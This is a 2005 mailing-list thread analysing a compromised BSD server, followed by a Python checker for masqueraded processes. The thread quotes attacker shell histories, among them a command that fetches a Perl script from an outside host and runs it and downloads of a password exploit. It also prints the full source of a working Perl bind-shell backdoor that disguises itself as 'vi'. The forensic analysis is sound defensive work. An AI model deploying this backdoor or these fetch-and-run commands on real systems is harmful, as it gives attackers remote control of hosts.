hacking ... shall we study it?

rookie asmrookie a gmail.com
Tue 29 Nov 2005 12:06:19 CET


2005/11/28, Dario Freni <saturnero a gufi.org>:
> Gianmarco Giovannelli wrote:
> >
> > I received this message from **** about a compromised server :-)
> >
> >>      2  21:09   cd .psybsd
> >>      3  21:09   dir -la
> >>      4  21:09   cat psybnc.conf
> >>      5  21:10   rm -rf *
> >>      6  21:10   cd ..
> >>      7  21:10   cd ...
> >>      8  21:10   ls
> >>      9  21:10   cd psybnc
> >>     10  21:10   ls
> >>     11  21:10   export PATH="."
> >>     12  21:10   ./swapper
> >>     13  21:10   exit
> >>     14  16:49   w
> >>     15  16:49   ps -aux
> >>     16  16:49   dir -la
> >>     17  16:49   cd /var/tmp
> >>     18  16:49   dir -la
> >>     19  16:49   cd ...
> >>     20  16:49   dir
> >>     21  16:49   cd psybnc
> >>     22  16:49   ls
> >>     23  16:50   export
> >>     24  16:50   swapper
> >>     25  16:50   ps -aux
> >>     26  16:50   exit
> >>     27  16:54   cat /etc/passwd
> >>     28  16:56   last
> >>     29  16:59   last
> >>     30  16:59   w
> >>     31  16:59   ps -aux
> >>     32  16:59   exit
> >>     33  3:45    uname -a
> >>     34  3:45    bash
> >>     35  3:45    sh
> >>     36  3:49    exit
> >>     37  6:45    bash
> >>     38  6:45    sh
> >>     39  6:51    exit
> >>     40  11:59   /usr/bin/perl
> >>     41  11:59   ps x
> >>     42  11:59   ls
> >>     43  11:59   vi bds
> >>     44  11:59   perl bds
> >>     45  12:00   ps x
> >>     46  12:00   kill -9 76439 43695
> >>     47  12:00   ps x
> >>     48  12:00   exit
> >>     49  12:03   wget
> >>     50  12:03   curl
> >>     51  12:04   emacs
> >>     52  12:04   gwget
> >>     53  12:04   kget
> >>     54  12:04   kget www.com.com/q/1
> >>     55  12:05   kget www.com.com/q~./1
> >>     56  12:05   kget www.com.com/q.1
> >>     57  12:05   ls
> >>     58  12:05   kget www.com.com/q.1 1
> >>     59  12:05   touch 1
> >>     60  12:05   kget www.com.com/q.1 1
> >>     61  12:05   kget 1
> >>     62  12:05   cat 1
> >>     63  12:05   rm 1
> >>     64  12:06   gmake
> >>     65  12:06   fetch
> >>     66  12:07   fetch www.com.com
> >>     67  12:07   fetch http://slickland.com/rk/bds.txt -o b.txt
> >>     68  12:07   ls
> >>     69  12:08   head bds.txt
> >>     70  12:08   rm bds.txt
> >>     71  12:09   cd /tmp ; fetch http://slickland.com/rk/bds.txt ; mv
> >> bds.txt bds.pl ; chmod 777 bds.pl ; perl bds.pl
> >>     72  12:09   ps x
> >>     73  12:09   kill -9 77329
> >>     74  12:10   cd ..
> >>     75  12:10   cd /
> >>     76  12:10   ls
> >>     77  12:13   exit
> >>     78  14:37   fetch slickland.com/xpl/bsdpass
> >>     79  14:38   fetch http://www.slickland.com/xpl/bsdpass
> >>     80  14:38   chmod +x bsdpass
> >>     81  14:38   ./bsdpass
> >>     82  14:38   rm bsdpass
> >>     83  14:38   vi bsdpass.c
> >>     84  14:38   gcc -o bsdpass bsdpass.c
> >>     85  14:39   ./bsdpass
> >>     86  14:40   ls
> >>     87  14:40   cat kmem
> >>     88  14:40   cat sendfile1
> >>     89  14:40   rm sendfile1
> >>     90  14:40   rm kmem
> >>     91  14:40   rm bsdpass.c
> >>     92  14:40   ls
> >>     93  14:40   ftp ftp.slickland.com
> >>     94  14:42   ftp ftp.slickland.com
> >>     95  14:43   rm bsdpass
> >>     96  14:43   ls
> >>     97  14:43   exit
> >>     98  23:48   history
> >>     99  23:48   history > hackterra.log
> >>    100  23:48   who
> >>    101  23:50   history
> >>
> >> here is dbs.txt
> >> #!/usr/bin/perl
> >> $port = 4132;
> >> $hide = "vi";
> >> unlink($0); $0 = $hide . "\0" x16;
> >> $SIG{'INT'}='IGNORE';$SIG{'HUP'}='IGNORE';$SIG{'TERM'}='IGNORE';
> >> $SIG{'CHLD'}='IGNORE'; if(fork()){exit(0);};
> >> use Socket; $proto = getprotobyname('tcp');
> >> socket(SERVER,PF_INET,SOCK_STREAM,$proto);
> >> setsockopt(SERVER,SOL_SOCKET,SO_REUSEADDR,pack("l",1));
> >> bind(SERVER,sockaddr_in($port,INADDR_ANY));
> >> if(listen(SERVER,SOMAXCONN)) { print("## BDS Started. Port $port\n");
> >> } else { die "listen: $!" };
> >> for(;$paddr = accept(CLIENT,SERVER);close CLIENT)
> >> {
> >> open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");
> >>    print("## BDS backdoor by Slick\n\n");
> >>    while(1)
> >>    {
> >>    print("[cmd]# ");
> >>    if (fork() == 0) {
> >>      $cmd=<STDIN>;
> >>      chomp($cmd);
> >>      exec($cmd);
> >>      exit 0;
> >>                     }
> >>    wait;
> >>    }
> >>    close(STDIN);close(STDOUT);close(STDERR);
> >> }
>
> A simple backdoor that opens a network service on port 4132, shows up as
> the process "vi" and gives a shell to whoever connects.
>
>
> >>
> >> I'd like to see the bsdpass.c file
>
> From an analysis of the bsdpass binary, a function dolisten turns up, plus
> calls to bind(), connect(), sendfile() (?) and a string like this:
>
> /usr/bin/chsh -s /bin/sh
>
> Another remote backdoor, I suppose.
>
>
> > and here is the user info (password info, complete with a shell :-)
> >
> >> here is what info did
> >>
> >>      2  22:15   cd
> >>      3  22:15   w
> >>      4  22:15   cd ..
> >>      5  22:15   cd ..
> >>      6  22:15   cd ..
> >>      7  22:15   cd ..
> >>      8  22:15   cd ..
> >>      9  22:15   cd ..
> >>     10  22:15   cd ..
> >>     11  22:15   cd /
> >>     12  22:15   cd
> >>     13  22:15   cd //
> >>     14  22:15   cd .
> >>     15  22:16   cd usr
> >>     16  22:16   var
> >>     17  22:16   exit
> >>     18  6:58    cd /var/tmp/" "
> >>     19  6:58    cd .psybsd
> >>     20  6:58    ./httpd
> >>     21  6:59    cd
> >>     22  6:59    w
> >>     23  6:59    cd ..
> >>     24  6:59    cd ..
> >>     25  6:59    exit
> >>     26  7:10    cd /var/tmp
> >>     27  7:10    ls
> >>     28  7:10    cd" "
> >>     29  7:10    cd " "
> >>     30  7:10    ls
> >>     31  7:10    cd .psybsd
> >>     32  7:10    ./http
> >>     33  7:10    ./httpd
> >>     34  7:10    cd
> >>     35  7:10    cd ..
> >>     36  7:10    cd ..
> >>     37  7:10    cd ..
> >>     38  7:10    cd ..
> >>     39  7:10    w
> >>     40  7:10    exit
> >>     41  21:36   cd /var/tmp
> >>     42  21:36   ls
> >>     43  21:36   cd .``.``.
> >>     44  21:36   cd '" "cd " "
> >>     45  21:36   cd " "
> >>     46  21:36   ls
> >>     47  21:36   cd .psybsd
> >>     48  21:36   ./httpd
> >>     49  21:36   cd
> >>     50  21:36   exit
> >>     51  17:56   w
> >>     52  17:56   cd /var/tmp
> >>     53  17:56   ls
> >>     54  17:56   cd " "
> >>     55  17:56   ls
> >>     56  17:56   cd .psybsd
> >>     57  17:56   ls
> >>     58  17:56   pic psybnc.conf
> >>     59  17:57   ls
> >>     60  17:57   pic menuconf
> >>     61  17:58   pic psybnc.conf.old
> >>     62  17:59   pic log
> >>     63  18:05   uname -a
> >>     64  18:05   uname -s
> >>     65  18:05   w
> >>     66  18:06   cd ..
> >>     67  18:06   cd ..
> >>     68  18:06   cd
> >>     69  18:06   cd ..
> >>     70  18:06   cd ..
> >>     71  18:06   rm -rf .psybsd
> >>     72  18:06   ls
> >>     73  18:06   cd
> >>     74  18:06   cd ..
> >>     75  18:06   exit
> >>     76  18:06   cd /var/tmp/" "
> >>     77  18:07   rm -rf .psybsd
> >>     78  18:07   ls
> >>     79  18:07   ls -all
> >>     80  18:07   ftp
> >>     81  18:10   ps -x
> >>     82  18:10   killall -9 10745
> >>     83  18:11   cd .psybsd
> >>     84  18:11   ls
> >>     85  18:11   tar -xvzf psyBNC2.3.2-5.tar.gz
> >>     86  18:11   rm -rf psyBNC*
> >>     87  18:11   mv psybnc .psybsd
> >>     88  18:12   cd .psybsd
> >>     89  18:12   make
> >>     90  18:14   mv psybnc sshd
> >>     91  18:14   ls
> >>     92  18:14   ps -x
> >>     93  18:14   kill -9 10745
> >>     94  18:16   ./sshd
> >>     95  18:18   uname -a
> >>     96  18:19   cat /etc/hosts
> >>     97  18:20   cd
> >>     98  18:20   cd ..
> >>     99  18:20   cd ..
> >>    100  18:20   exit
> >
> >
> >
> > What do you think they were doing?
>
> They were installing psybnc, that is, a bouncer for connecting to IRC. They
> renamed the binary to sshd so that nothing odd would show up in ps (apart
> from the leading ./, lusers). It is a sort of IRC proxy used to anonymise
> oneself on networks where the IP is publicly visible.
>
> Cheers,
> Dario

Excellent analysis. They renamed psybnc (psy for IRC), "disguising" it as
apache. IMHO they are just kiddies (amateurs) and with a bit of luck you
can even catch them... what do wtmp and utmp say?

rookie



--
Peace can only be achieved by understanding - A. Einstein
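From the defender's side, as an added example that is not code from the thread or from anyone in it: a checker for the two hiding tricks discussed above, the Perl backdoor that sets $0 to "vi" and the psybnc binary renamed sshd/httpd and run from a hidden directory under /var/tmp. It compares the name ps shows with the path of the binary actually executing; the sample records are constructed, and the scan_proc walker assumes a Linux-style /proc (an assumption, the compromised host in the thread is a BSD).

```python
# Added example, not code from the thread: cross-check what ps shows a process
# as against the binary it actually runs, the way both intrusions above hid
# themselves (a Perl backdoor named "vi", psybnc renamed "sshd"/"httpd" and run
# from a hidden directory under /var/tmp). The sample records are constructed.
import os
from dataclasses import dataclass

SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/local/sbin/")
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
INTERPRETERS = {"perl", "python", "sh", "bash"}
DAEMON_NAMES = {"sshd", "httpd", "crond", "inetd"}

@dataclass
class Proc:
    pid: int
    name: str  # argv[0] as ps shows it, e.g. "./sshd" or "vi"
    exe: str   # resolved path of the running binary (/proc/<pid>/exe)

def findings(p: Proc) -> list[str]:
    """Reasons this process looks like a masqueraded binary (empty if none)."""
    out = []
    shown = os.path.basename(p.name.split("\0")[0])  # $0 = "vi" . "\0" x 16
    real = os.path.basename(p.exe)
    if p.exe.startswith(SCRATCH_DIRS):
        out.append("runs from scratch directory")
    if any(d.startswith(".") or not d.strip() for d in p.exe.split("/")[1:-1]):
        out.append("binary sits in a hidden or blank-named directory")
    if real in INTERPRETERS and shown != real:
        out.append(f"{real} script presenting itself as '{shown}'")
    if shown in DAEMON_NAMES and not p.exe.startswith(SYSTEM_DIRS):
        out.append(f"'{shown}' is not the system daemon of that name")
    return out

def scan_proc(root="/proc") -> dict[int, list[str]]:
    """Walk a live Linux /proc (assumed) and return pid -> findings for flagged processes."""
    flagged = {}
    for pid in (d for d in os.listdir(root) if d.isdigit()):
        try:
            with open(f"{root}/{pid}/cmdline", "rb") as f:
                name = f.read().split(b"\0")[0].decode(errors="replace")
            exe = os.readlink(f"{root}/{pid}/exe")
        except OSError:
            continue  # process exited, or not ours to read
        if hits := findings(Proc(int(pid), name, exe)):
            flagged[int(pid)] = hits
    return flagged

# Constructed records mirroring the two histories above.
SAMPLES = [Proc(76439, "vi", "/usr/bin/perl"),                # bds.pl backdoor
           Proc(10745, "./sshd", "/var/tmp/ /.psybsd/sshd"),  # renamed psybnc
           Proc(1234, "/usr/sbin/sshd", "/usr/sbin/sshd")]    # the real sshd
```

Running `scan_proc()` as root on a live host prints nothing itself; iterate over the returned dict to see which pids were flagged and why.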


More information about the esperti mailing list